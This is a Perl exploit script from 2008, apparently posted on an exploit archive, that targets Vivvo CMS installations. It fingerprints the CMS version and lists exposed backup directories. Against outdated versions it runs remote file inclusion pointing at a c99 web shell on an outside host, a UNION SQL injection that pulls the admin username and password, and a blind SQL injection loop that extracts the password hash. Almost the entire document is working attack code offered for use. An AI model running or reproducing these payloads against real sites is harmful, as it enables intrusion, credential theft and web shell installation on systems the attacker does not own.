Home / exploitsPDF  

vivvocms-destroy.txt

Posted on 20 October 2008

#!/usr/bin/perl

#Vivvo CMS Destroyer
#uxmal666@gmail.com
#By Xianur0
#-------------CREDITS-------------
#http://milw0rm.com/exploits/4192
#http://milw0rm.com/exploits/3326
#http://milw0rm.com/exploits/2339
#http://milw0rm.com/exploits/2337
#-------------/CREDITS-------------

print "
                           Vivvo CMS Destroyer By Xianur0
";

#-----------CONFIG----------
$SHELL='http://y4m15p33dy.vilabol.uol.com.br/c99.txt';
$textshell = 'C99Shell v.';
#----------/CONFIG----------
use LWP::UserAgent;
use Switch;
my $path = $ARGV[0];
$path = shift || &uso;
sub uso { print "
Use: vivvo.pl [URI to Vivvo CMS]
"; exit;}
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17");
$req = HTTP::Request->new(GET => $path."/feed.php?output_type=rss");
$req->header('Accept' => 'text/javascript, text/html, application/xml, text/xml, */*');
$res = $ua->request($req);
if ($res->is_success && $res->content =~ "generator") {
&parser($res->content);
} else {
$req = HTTP::Request->new(GET => $path."/index.php?feed");
$req->header('Accept' => 'text/javascript, text/html, application/xml, text/xml, */*');
$res = $ua->request($req);
if ($res->is_success && $res->content =~ "generator") {
&parser($res->content);
}
else { print "
Error getting data!
"; exit;}
}

&backups;


sub parser {
my @datos = split('<generator>Vivvo CMS ', $_[0]);
my @version = split('</generator>', $datos[1]);
$version = $version[0];
if($version[0] == "") {
my @datos = split('<meta name="generator" content="Vivvo ', $_[0]);
my @version = split('" />', $datos[1]);
$version = $version[0];
}
print "Version: ".$version."
";
if($version < "4") { print "Outdated version of Vivvo CMS!
"; &desactualizada($version);}
}

sub backups {
$req = HTTP::Request->new(GET => "$path/backup");
$req->header('Accept' => 'text/xml');
$res = $ua->request($req);
if ($res->is_success) {
if($res->content =~ "<title>Index of /backup</title>") {
print "
              Backups:
";
my @datos = split('<a href="', $res->content);
$datos[0] = "";
foreach $archivos (@datos) {
my @archivo = split('">', $archivos);
if($archivo[0] !~ /?/){print $archivo[0]."
"; }
}
print "
Unprotected Directory: $path/backup
";
}
}
}

sub rfi {
$vuln = $_[0];
$req = HTTP::Request->new(GET => "$path/$vuln=$SHELL?");
$req->header('Accept' => 'text/xml');
$res = $ua->request($req);
if ($res->is_success) {
if($res->content =~ $textshell) {
print "RFI Detected!: $path/$vuln=$SHELL?";
}
}}

sub sql {
$exploit = "pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20FROM%20tblUsers%20where%20userid=1";
$req = HTTP::Request->new(GET => "$path/$exploit");
$req->header('Accept' => 'text/xml');
$res = $ua->request($req);
if ($res->is_success) {
print "SQL Injection Generated: $path$exploit";
}
}

sub blind {
for($i=1; $i<32;$i++) {
for($o=30; $o<102;$o++) {
$injection = "$path/index.php?category=/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),".$i.",1))=".$o;
$req = HTTP::Request->new(GET => $injection);
$req->header('Accept' => 'text/xml');
$res = $ua->request($req);
if ($res->is_success) {
if($res->content != "") {
print "Blind Done Correctly!: $injection";
}
}
}}}

sub desactualizada {
$version = $_[0];
switch ($version) {
case "3.4"    { print "Blind SQL Injection trying ....
"; &blind; print "Intentando RFI....
"; &rfi('include/db_conn.php?root');}
case "3.2"    { print "RFI trying ....
"; &rfi('index.php?classified_path'); print "SQL Injection....
"; &sql;}
else { print "There is no registration for this Exploit Version! : (
";}
}
}

 

TOP

Malware :

Exploits :